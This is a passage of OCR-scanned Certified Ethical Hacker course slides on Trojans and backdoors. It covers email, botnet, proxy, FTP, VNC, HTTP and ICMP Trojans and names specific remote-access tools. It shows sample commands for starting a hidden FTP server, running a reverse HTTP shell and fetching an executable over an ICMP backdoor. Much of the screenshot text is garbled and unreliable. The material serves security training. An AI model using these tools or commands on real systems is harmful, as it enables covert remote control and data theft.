  • 50. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors FIGURE 6.14: An example of Trojan embedded in a Word document E-m ail Troj ans CEH J Attacker gains remote control of a victim computer by sending email messages J Attackers can then retrieve files or folders by sending commands through email J Attacker uses open relay SMTP server and fakes the email's FROM field to hide origin Instructions are sent to the victim through emails / ‫ן‬ - 7‫ן‬ Any commands for me? Send me :creditcard.txt file and launch calc.exe Here is the requested file mt Email Attacker '(m y Calc.exe executed Internet Firewall Victim Copyright G by EG-GtlMCil. All Rights Reserved. Reproduction is Strictly Prohibited. Email Trojans spread through bulk emails. Trojan viruses are sent through attachments. The moment the user opens the email, the virus enters the system and spreads and causes a lot of damage to the data in the system. It is always recommended that users not open emails from unknown users. Sometimes email Trojans may even generate automatic mail and send it to all the contacts present in the victim's address book. Thus, it is spread through the contact list of the infected victim. Attackers send instructions to the victim through email. When the victim opens the email, the instructions will be executed automatically. Thus, attackers can retrieve files or folders by sending commands through email. The following figure explains how an attack can be performed using email Trojans. Module 06 Page 876 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 51. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors Instructions a r • se n t to th e victim through em ails Any com m ands for m e? Send m e : araditcard. txt file a n d launch calc.exe H ere is th e re q u e ste d file j! Jp ? Email ; C dk.exe j e x ec u te d I ‫*יין‬ * y rl• Attacker Internet Firewall Victim FIGURE 6.15: Illustrating the attack process using email Trojans Module 06 Page 877 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 52. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors C EH E -m ail Trojans: R em oteB yM ail C ee e 0 «ds McU d Ertvai: :«n r 0 Next eavjrf check 000900 Nov* ctociung POP patswad last itspow SMTP Mfv«r $t«t• No co«*tt ton Avaijfate wrnnand 10/tjeAa oxn Aulherticaton|Sanew POP l o ‫ « ־‬ea a . j] SMTPuter Piogrmt SMTP pa«wad p * t * < x l ...... __ SoltPwfe (»c«pod*0tolip#<*• canl uno** * *0‫״‬ M * [ ••*0‫׳‬ V •‫ » » ־‬pe Q» > sn»c n < r d* m> »• w ‫ י‬y uteri mai»* »*‫יי ״ • ״.!0״‬ _____ « ‫״‬ 6 ‫י״׳‬ ----‫״‬ _ Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. EAmUail TArojans: A V emVoteB yM iaili U II A A A S JV & A L 1 9 ■ R V I I I / I V A / Jf A f a i RemoteByMail is used to control and access a computer, irrespective of its location, simply by sending email. With simple commands sent by email to a computer at work or at home, it can perform the following tasks: 0 Retrieves list of files and folders easily 0 Zips files automatically that are to be transferred 0 Helps to execute programs, batch files, or opens files This is an easier way to access files or to execute programs on a computer remotely. The main screen displays information that the program has received and processed: 0 Start Server: Click the Start Server icon for RemoteByMail to begin the process and receive email 0 Stop: Click the Stop icon to stop the application at any time 0 Check now: Checks for next scheduled email 0 Statistics: Displays program information 0 Listening to Accounts: Displays accounts and associated email addresses Module 06 Page 878 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 53. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors 0 Emails received: Displays email list containing commands the program has received 0 Command queue: Displays commands the program has received but not yet processed 0 Outgoing emails: Checks for processing email 0 Emails send: Displays list of email sent by RemoteByMail RemoteByMail accepts and executes the following commands: 0 HI: Used to send email with the content "Hi" to your email address 0 SEND: Sends files located on the host computer to your email address 0 ZEND: Zips and then sends files or folders located on the host computer to your email address. To open a Zip attachment after you receive, enter the password you chose when you created the account 0 EXECUTE: Executes programs or batch files on the host's computer 0 DIR: Sends the directory of a drive or folder to your email address N» Accor• T o o• © U jf> ^ 0 .0 D*• ficm C#• >> o 3 Cm* im oM 0 E«m* mr* 0 Nerf«ooicr«d »C9CC Hw c.'Kirg 9 POP tm!■wig w SMTP Mfvw IwHpwhcqn SMTP‫*״‬ I A hen*c«hoajSame« POP 3 »< LMWtr Om To ‫•ז‬ I SMTP9$mm* C1«MaM*ct«gM ifim J {* J& a ttC•* * o ty M i ' • itf t ‫•יייי‬ nv.'/.'xn w n /sm r m ‫: «**־‬fw'tng m k«I , v«« r f*.0«* ‫־‬ u+nnt* (,*mac** ✓0* I X iw ! 7 b* | FIGURE 6.16: RemoteByMail screenshots Module 06 Page 879 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 54. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors D e f a c e m e n t T roj a n s CEH D efacem ent Trojans Defacement Trojans, once spread over the system, can destroy or change the entire content present in the database. This defacement Trojan is more dangerous when attackers target websites; they physically change the entire HTML format, resulting in the changes of content of the website, and even more loss occurs when this defacement targets e-business activities. It allows you to view and edit almost any aspect of a compiled Windows program, from the menus to the dialog boxes to the icons and beyond. Resource editors allow you to view, edit, extract, and replace strings, bitmaps, logos, and icons from any Windows program. They apply target-styled Custom Applications (UCAs) to deface Windows applications. Example of calc.exe defaced: Module 06 Page 880 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 55. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors You Are Hacked! I !!! View Help ~~0. Defaced calc.exe E Calculator 1 You AieHeckedtlll! View heto I I b k *1 < « |i m 0 0 1 E q it ce ‫ך‬ ‫ן‬ c ‫ן‬ ‫ ׳הכו‬i p ■ z 7 ] 0 0 IZ] |6 acfctfrace| | |[ ~ C ‫ה ח ר־ו ה ח ה ח ה ח‬ 00 ‫ש‬ ‫םש‬ 0 ‫ר^ורחה־ו וז־וה־ו‬ ‫ ׳ 1 וי״‬i i ; . [ ‫>׳‬ ] jn-j ‫ה־וה־־וו ו ה ח ה־ו‬ C E 0 0 0 □□ □ FIGURE 6.16: An example of calc.exe defaced Module 06 Page 881 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 56. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors D efacem ent Trojans: Restorator Source: http://www.bome.com Restorator is a versatile skin editor for any Win32 programs. The tool can modify the target interface of any Windows 32-bit program and thus create target-styled Custom Applications (UCAs). You can view, extract, add, remove, and change images, icons, text, dialogs, sounds, videos, version, dialogs, and menus in almost all programs. Technically speaking, it allows you to edit the resources in many file types, for example .ocx (Active X), .scr (Screen Saver), and others. The attacker can distribute modifications in a small, self-executing file. It is a standalone program that redoes the modifications made to a program. Its Grab function allows you to retrieve resources from files on a target's disk. Restorator is the Borne flagship product that allows you to do resource (resources are application-dependent data that the respective programmer includes in the program) editing. It is a utility for editing Windows resources in applications and their components, e.g., files with .exe, .dll, .res, .rc, and .dcr extensions. You can use this for translation/localization, customization, design improvement, and development. This resource editor comes with an intuitive target-interface. You can replace logos and can control resource files in the software development process. It can intrude into the target's system and its working programs. Module 06 Page 882 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 57. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors storator 2007 Trial - C:SoftwareSoftpedia.exe File Resources Viewer Edit Tools Help ‫ ם‬a-aaoo, Res Viewer H B * •3• 1 Resouice Tree a ]§) Softpedia.exe S String mmmm Saving Delphi/C++ Builder Forms 2 Neutr< RCData S O Q IS □ 1 1111 Icon □ MAIN I Q 1C) Version □ 1 B t j Manifest 1 ‫1 □־־‬ Codepage Shell Integration Viewer Text Editor 1*1 Show TooKips [default] 0 Allow multiple Restorator instances 0 Show splash screen on start ‫ ח‬Keep Restorator Window always on top 0 Ask for Folder, when assigning/extracting all [default] Number of recently used files in file menu: <L 10 ^ Number 0 recently found files in file menu: 1 File Browser RC Files Advanced 20 2> 0K String4089Neutral 19 20 21 22 23 String 65426 65427 65428 65429 65430 Integer overflow Invalid floating point operation Floating point division b y zero Floating point overflow Floatina point underflow 1 open file FIGURE 6.17: Restorator Screenshot Module 06 Page 883 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 58. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors B o tn e t T r o ja n s 0 CEH J Botnet Trojans infect a large number of computers across a large geographical area to create a network of bots that is controlled through a Command and Control (C&C) center J 0 Botnet is used to launch various attacks on a victim including denial-of-service attacks, spamming, click fraud, and the theft of financial information ,0 0 . Website Botnet Server Copyright © by EG-GlDDCil. All Rights Reserved. Reproduction is Strictly Prohibited. Cl Botnet T rojans --- A botnet is a collection of software robots (worms, Trojan horses, and backdoors) that run automatically. It refers to a collection of compromised machines running programs under a common command and control infrastructure. A botnet's originator (attacker) can control the group remotely. These are computers (a group of zombie computers) infected by worms or Trojans and taken over surreptitiously by attackers and brought into networks to send spam, more viruses, or launch denial of service attacks. This is a computer that has been infected and taken over by an attacker by using a virus/Trojan/malware. Botnet owners usually target educational, government, military, and other networks. With the help of botnets, attacks like denial of service, creation or misuse of SMTP mails, click fraud, theft of application serial numbers, login IDs, credit card numbers, etc. are performed. Module 06 Page 884 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 59. Exam 312-50 Certified Ethical Hacker Ethical Hacking and Countermeasures Trojans and Backdoors Botnet C&C Server FIGURE 6.18: Illustrating the process of infecting company's website using Botnet Trojans It has two main components: 0 Botnet 0 Botmaster They target both businesses as well as individual systems to steal valuable information. There are four botnet topologies. 0 Hierarchal 0 Multi Server 0 Star 0 Random (Mesh) Module 06 Page 885 Ethical Hacking and Countermeasures Copyright © by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 60. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors Botnet Trojan: Illu sio n Bot and NetBot Attacker Reload ‫״‬pdM* cre B T N T 1 M O B O irO 1 1 0 1 H • ’( U o* 2j ho* 1aaa1 Pat f* 67 5 6 67 6 6 C a ttc s h r tvn P*»: Chan #ch*n *e* IJH tf o 2 1 P» ot Dd«J m nxn 4 * :5 Safci .pat Sock oat HP. PC* R R ‫ ״׳י‬Random tanpe R 2001 Bindttwi. port RCAocim ‫ א‬ixccvcro ‫זג‬ MD5 C«ypt * CdrcMicc *‫ ° ״‬OP * W a r IRC charrel ‫,*■.*.! י — * ״‬ 1 ‫•״‬MW “ ,/ |Rr ,‫״‬ O JSXPSP2 yM FbtdVduw Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. Botnet Trojan: Illu sio n Bot a n d NetBot A ttack er Illusion Bot is a clear GUI tool for configuration. When this bot starts, it checks the OS version and if it detects Win98, it calls the Register Service Process API to hide the process from the Task Manager. The bot then proceeds to install the rootkit component. If the installation fails, the bot tries to inject its code inside the explorer.exe process. Illusion Bot is a GUI tool. Features: 0 C&C can be managed over IRC and HTTP 0 Proxy functionality (Socks4, Socks5) 0 FTP service 0 MD5 support for passwords 0 Rootkit 0 Code injection 0 Colored IRC messages 0 XP SP2 Firewall bypass 0 DDOS capabilities Module 06 Page 886 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 61. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors NetBot Attacker provides a simple Windows Ul for controlling a botnet, reporting and managing the network, and commanding attacks. It installs in to the systemin a very simple way such as RAR file with two pieces: an INI file (see the following, partially editedand obscured) and a simple EXE. The original NetBot Attacker is a backdoor; thistool retainsthat capability and lets you update the bot and be a part of the rest of the botnet. 9 Br^ry C Doajmem and 5«tngsWmu»'Pa«5c^ cio/ABOT6INARY E>t — ‫־‬ Retoad IRCAdnrabtfion 1 0 >Jme hosts flltac* Atea Collective order Ute 1 1 1 1| Hot* 10001 Poll 6667 Chan BeHsn Pats 4*$r 2 Horf 10001 1 Poll 6667 Chon Uchan Paw W E B A<*nrct140n 1| Most Port Paih 2 Host 1 Port Path Felteshlfw i sec r * * j » m m c« Socfc*4. p t♦ o R * $ock»5. pott R FTP 00< R « Random larnj? ‫׳‬ 2001 ■ 3000 R Bndshel port IRC Acc*1 t BOT PASSWORD O0km * lot‫ •*׳‬t et‫*׳‬N D 1»v#t S*v# MDSDypt < *ny *‫־‬ + A140 0P admn onlRC ehannri ‫ •*•*ז‬n ipgn'if + CotocdRC nreuages * IRC tmvH + Irpct cod• |rf dnvat fWc| * FbodV^jat «‫ ״‬Add to autoload ‫ם‬ Ext | Sava paiwwtd Bypat tX PSP 2 F « **al About FIGURE 6.18: Illusion Bot and NetBot Attacker Screenshots Module 06 Page 887 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 62. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors P ro x y S e r v e r T ro ja n s P ro x y T ro ja n ,a n W Trojan Proxy is usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the Internet . Hidden S erve r Proxy server Trojan, when infected, starts a hidden proxy server on the victim's computer Infection Thousands of machines on the Internet are infected with proxy servers using this technique | p •aS ©‫'׳ 1 ־‬i ® Attacker Victim (Proxied) P ro ce ss Target company Internet Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. Proxy Server T ro jan s A proxy server Trojan is a type of Trojan that customizes the target's system to act as a proxy server. A proxy server Trojan, when infected, starts a hidden proxy server on the victim's computer. The attacker can use this to carry out any illegal activities such as credit card fraud, identity theft, and can even launch malicious attacks against other networks. This can communicate to other proxy servers and can also send an email that contains the related information. 4 ! P ‫׳׳־‬ ■‫׳‬ Attacker Victim (Proxied) Internet Target Company FIGURE 6.19: Attacker infecting Target company's system using Proxy Server Trojans Module 06 Page 888 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 63. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors Proxy Server Trojan: W3bPrOxy Tr0j4nCr34t0r (Funny Name) J W3bPr0xy Tr0j4n is a proxy server Trojan which support multi connection from many clients and report IP and ports to mail of the Trojan owner Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. Proxy Server Trojan: W 3bPrO xy Tr0j4nCr34t0r (Funny N am e) W3bPrOxy Tr0j4nCr34t0r is a proxy server Trojan developed in order to access systems remotely. It supports multi-connections from many clients and reports IP and ports to the email of the Trojan owner. Module 06 Page 889 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 64. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors ZHTectm Listening Ports [Separate ports with a slm icolon (;)] 10;Zl;Z2;80;81;135;l36;«lM12;666;H33;1434;2012| %[Mndows system] few f V o S f • W ekom c to W3bPr0xy TrOHn Cr34IOr V .1 . D FIGURE 6.20: W3bPrOxy Tr0j4nCr34t0r detecting IP address Module 06 Page 890 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 65. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors FTP Trojans CEH Send me c r e d it c a r d . t x t file (FTP Server installed in the background) Here is the requested file 06/02/2012 09/06/2012 08/24/2012 05/21/2012 05/21/2012 06/04/2012 08/11/2012 1,024 rod 0 abc.tzt <0IR> AdventHet 0 AUTOEXEC .BAT 0 COBFIG.SYS <0Ht> Data <0IR> Documents Victim FTP T ro jan : TinyFTPD FTP Trojans install an FTP server on the victim's machine, which opens FTP ports An attacker can then connect to the victim's machine using FTP port to download any files that exist on the victim's computer £53 Command Prompt C : D o c w e n t s a n d S e t tings AtM1 nDesktopTinyFTPD 21 55555 test test c: w i n 98 all RHLCD Tiny FTPD VI. 4 By WinKggDrop FTP Server Is Started ControlPort: 21 BindPort: 55555 UserNaae: test Password: test B a a e D ir: c:win96 A l l o v d IP: all Local Address: 192.168.168.16 ReadAccess: Yes WnteAccess: Yes LIs t A c c e s s : Yes CreateAccess: Yes Delet e A c c e s s : Yes Execut e A c c e s s : Yes No UklodcAcoess: No AnonyaousAccess Check Tise Oat Thread Created Successfully *************** 0 Connection Is In Use Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. FTP T ro jans An FTP Trojan is a type of Trojan that is designed to open port 21 and make the target's system accessible to the attacker. It Installs an FTP server on the target's machine, allowing the attacker to gain access to sensitive data and download/upload files/programs through the FTP Protocol. Further, it also installs malware on the targets system. Credit card information, confidential data, email addresses, and password attacks can also be employed where only the attacker gains access to the system. FTP Server Send me c : c r e d i t c a r d . t x t file (ft 95V*• Hacker (FTP Server installed in the background) Here is the requested file V u lu n c I n d r i v e C h a s no l a b e l . Vo 1 u n e S e r i a l N u n b e r i s D45E-9FRE D i r e c t o r y o f C : 0 6 /0 2 /2 0 1 2 1 ,0 2 4 - r n d 0 9 / 0 6 /2 0 1 2 0 a b c . t x t 08/24/2012 <D1K> AdventNet 0 5 / 2 1 /2 0 1 2 0 AUTOEXEC.BAT 0 5 / 2 1 /2 0 1 2 0 CONFIG.SYS 0 6 /0 4 /2 0 1 2 <DIR> D a t a 0 8 / 1 1 /2 0 1 2 <DIR> D o c u m e n ts a n d Victim FIGURE 6.21: Attacker infecting victim's system using FTP Trojans Module 06 Page 891 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 66. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors FTP T rojan: TinyFTPD Command Prompt C:Documents and SettingsAdminDesktopTinyFTPD 21 55555 test test c: win98 all RWLCD Tiny FTPD VI.4 By WinEggDrop FTP Server Is Started ControlPort: 21 BindPort: 55555 UserName: test Password: test HomeDir: c:win98 Allowd IP: all Local Address: 192.168.168.16 ReadAccess: Yes WriteAccess: Yes LIstAccess: Yes CreateAccess: Yes DeleteAccess: Yes ExecuteAccess: Yes UnlockAccess: No AnonymousAccess: No Check Time Out Thread Created Successfully *************** waiting For New Connection 0 Connection Is In Use FIGURE 6.22: TinyFTPD Screenshot Module 06 Page 892 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 67. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors CEH VNC Trojans VNC Trojan starts a VNC Server daemon in the infected system It connects to the victim using any VNC viewer with the password "secret‫״‬ i Since VNC program is considered a utility, this Trojan will never be detected by anti virus Command and control instruction f t Attacker Victim VNC Server Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. VNC T ro jans VNC Trojans allow attackers to use the target's computer as a VNC server. These Trojans won't be detected by antiviruses after they are run, because VNC Server is considered a utility. Performs the following functions when it infects the system: 0 Starts VNC Server daemon in the background when infected 0 Connects to the target using any VNC viewer with the password "secret" Command and control Instruction VNC Traffic Attacker Victim VNC Server FIGURE 6.23: Attacker uses victim's computer as VNC server using VNC Trojans Module 06 Page 893 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 68. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors VNC Trojans: WinVNC and VNC Stealer E M Itk.ul IUcIm Incoming Connections ® OK f? Accept Socket Connections Display Number [~ im ttiM VNC S te ale r WinVNC WinVNC: Current User Properties - _‫״‬ | I? Auto O S Cancel Apply Password: r* Accept CORBA Connect.':.'! r r Ftp • Settin gs Host: Disable Remote Keyboard & Pointer Disable Local Keyboard & Porte* Update Handing Pol Consoie Windows Only l~ Poll Ful Screen f? Pol Foreground Window F T ^ Pol Wrtdow Under Cusor Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. ‫ ־‬VNC T rojans: WinVNC a n d VNC S tealer WinVNC and VNC Stealer are two VNC Trojans. WinVNC WinVNC is used for a remote view or to control a Windows machine so this becomes a threat as attackers are able to inject a Trojan into the system and then they are able to access the target's system remotely. VNC S tealer VNC Stealer is a Trojan written in Visual Basic. VNC.EXE has been used to perform the following behavior: Q The process is packed and/or encrypted using a software packing process Q Creates system tray pop-ups, messages, errors, and security warnings Q Adds products to the system registry 9 Writes to another Process's Virtual Memory (process hijacking) 9 Executes a process 0 Creates new folders on the system Module 06 Page 894 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 69. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors 9 This process deletes other processes from a disk 9 The process hooks code into all running processes, which could allow it to take control of the system or record keyboard input, mouse activity, and screen contents Registers a Dynamic Link Library File W inVNC VN C S te a le r WinVNC: Current User Properties Incoming Connections OK !7 Accept Socket Connections Cancel Display Number: [~ Apply Password: P Accept C0R8A Connector!: r~ Disable Remo»e Keyboard I Pointer T Disable Local Keyboard i Ponte* Update Handkng r n Pol Ful Screen (7 Pol Foreground Window Pol Console Windows Only T R ^ C w J O rtv 1 PdW ndow Under Cusor “ FIGURE 6.23: Screenshots showing WinVNC and VNC Stealer Module 06 Page 895 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 70. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors H T T P /H T T P S T r o ja n s CEH The child program appears to be a user to the firewall so it is allowed to access Spawn HTTP Trojans can bypass any firewall and work in the reverse way of a straight HTTP tunnel the Internet W / They are executed on the internal host and spawn a child at a predetermined time ^ HTTP request to download a file Trojan passes through Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. HTTP/HTTPS T rojan s HTTP/HTTPS Trojans can bypass any firewall, and work in the reverse way of a straight HTTP tunnel. They use web-based interfaces and port 80. These Trojans are executed on the internal host and spawn a child every day at a certain time. The child program appears to be a target to the firewall which, in turn, allows it to access the Internet. However, this child program executes a local shell, connects to the web server that the attacker owns on the Internet through a legitimate-looking HTTP request, and sends it a ready signal. The legitimatelooking answer from the attacker's web server is in reality a series of commands that the child can execute on the machine's local shell. All traffic is converted into a Base64-like structure and given as a value for a cgi-string, so the attacker can avoid detection. The following is an example of a connection: Slave: GET/cgi-bin/order? M5mAejTgZdgYOdglOOBqFfVYTgjFLdgxEdblHe7krj HTTP/1.0 Master replies with: gSmAlfbknz The GET of the internal host (SLAVE) is just the command prompt of the shell; the answer is an encoded "Is" command from the attacker on the external server (MASTER). The SLAVE tries to connect daily at a specified time to the MASTER. If needed, the child is spawned because if the shell hangs, the attacker can check and fix it the next day. In case the administrator sees connections to the attacker's server and connects it to himself, the administrator just sees a Module 06 Page 896 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 71. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors broken web server because there is a token (password) in the encoded cgi GET request. W W W proxies (e.g., squid, a full-featured web proxy cachel) are supported. The program masks its name in the process listing. The programs are reasonably small with the master and slave programs, just 260-lines per file. Usage is easy: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and run ‫״‬rwwwshell.pl" on the MASTER just before it is the time at which the slave tries to connect. FIGURE 6.24: Victim's system infected with HTTP Trojans Module 06 Page 897 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 72. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker HTTP Trojan: HTTP RAT Infect the victim's computer with s e r v e r . exe and plant HTTP Trojan The Trojan sends an email with the location of an IP address Connect to the IP address using a browser to port 80 e Displays ads, records personal data/keystrokes » Downloads unsolicited files, disables programs/system © Floods Internet connection, and distributes threats © Tracks browsing activities and hijacks Internet browser 6 Makes fraudulent claims about spyware detection and removal Copyright © by EG-GMMCil. All Rights Reserved. Reproduction Is Strictly Prohibited. HTTP Trojan: HTTP RAT RATs are malicious programs that run invisibly on host PCs and permit an intruder remote access and control. A RAT can provide a back door for administrative control over the target computer. Once the target system is compromised, the attacker can use it to distribute RATs to other vulnerable computers and establish a botnet. The RAT enables administrative control and makes it possible for the attacker to watch all the target's actions using keyloggers or any other spywares. An attacker can also implement credit card fraud, identity theft using confidential information, and can remotely access web cams and video recordings, take screenshots, format drives, and delete, download, and alter files. It can't be detected as it works like genuine programs and it is not easily noticed. Module 06 Page 898 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 73. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors □ HTTP RAT 0.3 1 r'rXMTTPWebserver RAT • bJ iIxk kdoor / b y zOmbie vfl.31 Infect the victim's computer with server. exe and plant HTTP Trojan <*> KM x rn lM iWngi The Trojan sends an email with the location of an IP address & tend noM1c*hon wtfh p •ddrett 10 rnal © SMTP t a w 4 serving mat u c4n specrfy t«v«4l s « w t detntfod Mrih . I B S H S B S S 8 S S 9 ---y o u « m d «tt* 1s (you@mad c an P cteeFwWA t»ve»p rtf8 o 6 <2> Connect to the IP address using a browser to port 80 Victim A Generates | server. exe : using HTTP RAT : w » k o m » 2 HTTP_RAT in fe c te d c o m p u te r >:] «I'yn g tiiM rw m l rti h 1 »«l i■ mi. m1 n ■ l h »n m Attacker FIGURE 6.25: Attacker infecting Victim's system using HTTP RAT Module 06 Page 899 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 74. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors Shttpd Trojan - HTTPS (SSL) 0 CEH 0 J SHTTPD is a small HTTP Server that can be embedded inside any program J It can be wrapped with a genuine program (game chess . exe), when executed it will turn a computer into an invisible web server 0 Normally Firewall allows you through port 443 Attacker Encrypted Traffic 0 Victim IP: 10.0.0.8:443 IP: 10.0.0.5:443 Connect to the victim using Web Browser Infect the victim's computer with c h e s s . e x e http://10.0.0.5:443 S h t t p d should be running in the background listening on port 443 (SSL) Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. Shttpd T rojan - HTTPS (SSL) o -fr-a Shttpd is a small HTTP server that can easily be embedded inside any program. C++ source code is provided. Even though shttpd is not a Trojan, it can easily be wrapped with a chess.exe file and it can turn a computer into an invisible web server. 0 Infect the target's computer with chess.exe. 0 Shttpd should be running in the background listening on port 443 (SSL). 0 Connect to the target using a web browser: http://10.0.0.5:443. Normally Firewall allows Attacker you through port 443 6 Encrypted Traffic Connect to the victim using Web Browser http://10.0.0.5:443 Victim IP: 10.0.0.8:443 IP: 10.0.0.5:443 Infect the victim's computer with chess . ex e Shttpd should be running in the background listening on port 443 (SSL) FIGURE 6.26: Attacker infecting Victim's system using Shttpd Trojan Module 06 Page 900 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 75. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors ICM P T unneling J Covert channels are m ethods in w hich an attacker can hide th e data in a protocol that is undetectable J They rely on techniques called tunneling, which allow one protocol to be carried o ver another protocol J V IC M P tunneling uses IC M P echo-request and reply to carry a payload and stealthily access or control the victim 's machine ‫ן‬ ICMP Client (Command: ICMP Trojan: icm psend ICMP Server (Command: icmpsend <victim IP>) & icmpsrv -install) 0 ‫ ־‬Command Prompt Command Prompt C:Documents and Sett»>gsAdm1n1strat0f.VIND0WSDeskt0pl CMP Backdoor Win32>1cmp Send 127 0 0 1 —( ICMP-Cmd vl.O b eta, b y g x iso n e ]— - i E-mail: g ^ g r K tf hotmail.wm ] - —{ 47) Commands are sent using ICMP protocol C:Docunwnts and SettilngsAdmlnlstrator.VINDOWSDesktopICMP Backdoor Wln32>kmp —{ ICMP-Cmd vl.O beta, by gxlsone }— 2012/B/151— U sage: ic m p se n d Rem otelP CtrHC or Qfq to Q uite H/h fo r help 1c1ap-caco>H [h ttp ://127.0.0.1 /hack,exe =a d m in exe] <Downlo3d Files. P arth is Wsystem 32> [psltst] <Lrst th e P ro c ess> [pski■ ID] <Ki■ th e P ro c ess> C om m an d <run th e com m an d > -i 2012/»/15 b~ Usage: Icmpsrv -install <to Install sarvtca> kmpsrv -remove <to remove servka> Transmitting FUa - Success I Creating Service - Success I Starting Service _ Pending _ Success I C:Documents and SettingsVWmln»str«tor.VINOOWSDesfctopVlCMP Backdoor Win32 Cbpyright © by EC-CMICil. All Rights ^gServed. Reproduction is Strictly Prohibited. ICMP Tunneling The concept of ICMP tunneling is simple since arbitrary data portion of ICMP_ECHO and ICMP_ECHOREPLY packets is contains a covert channel that can be destroyed due to tunneling. the contents of ICMP_ECHO traffic, making the use of this channel information tunneling in the possible. ICMP_ECHO traffic Network devices do not filter attractive to hackers. Attackers simply pass them, drop them, or return them. The Trojan packets themselves are masquerading as common ICMP_ECHO traffic. The packets can encapsulate (tunnel) any required information. Covert channels are methods in which an attacker can hide the data in a protocol that is undetectable. They rely on techniques called tunneling, which allow one protocol to be carried over another protocol. A covert channel is defined as a vessel through which the information can pass, and it is generally not used for information exchanges. Therefore, covert channels cannot be detected by 